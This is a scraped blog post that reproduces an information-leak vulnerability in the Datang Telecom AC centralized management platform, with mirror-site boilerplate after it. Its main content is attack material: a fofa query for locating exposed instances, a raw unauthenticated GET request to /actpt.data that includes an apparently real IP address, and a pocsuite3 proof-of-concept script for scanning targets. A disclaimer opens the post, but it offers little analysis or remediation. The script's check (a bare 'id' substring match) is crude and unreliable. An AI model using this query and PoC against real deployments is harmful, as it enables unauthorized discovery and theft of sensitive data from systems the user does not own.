Vulnerability recurrence-Datang Telecom AC centralized management platform sensitive information leakage vulnerability (with vulnerability detection script)

Internet 2023-12-27 21:31:36 views: null

Disclaimer

The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.

Vulnerability description

Datang Telecom AC centralized management platform has sensitive information leakage vulnerability

fofa statement

app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="

POC plus detection

GET /actpt.data HTTP/1.1
Host: 
Referer: http://122.227.210.230:800/relogin.htm
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

poc script

pocsuite framework for scripts

# _*_ coding:utf-8 _*_
# @Time : 2023/12/22
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class datang_dianxinAC_information_leakage(POCBase):
    pocDesc = '''大唐电信AC集中管理平台敏感信息泄漏漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-22'
    name = '大唐电信AC集中管理平台敏感信息泄漏漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/actpt.data'

        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'Keep-Alive',
            'Pragma': 'no-cache',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'no-cache'
        }

        try:


            response = requests.get(url, headers=headers)
            if response.status_code == 200 and 'id' in response.text:
                result['VerifyInfo'] = {}


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(datang_dianxinAC_information_leakage)

Script exploit

Guess you like

Origin blog.csdn.net/jjjj1029056414/article/details/135155552
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com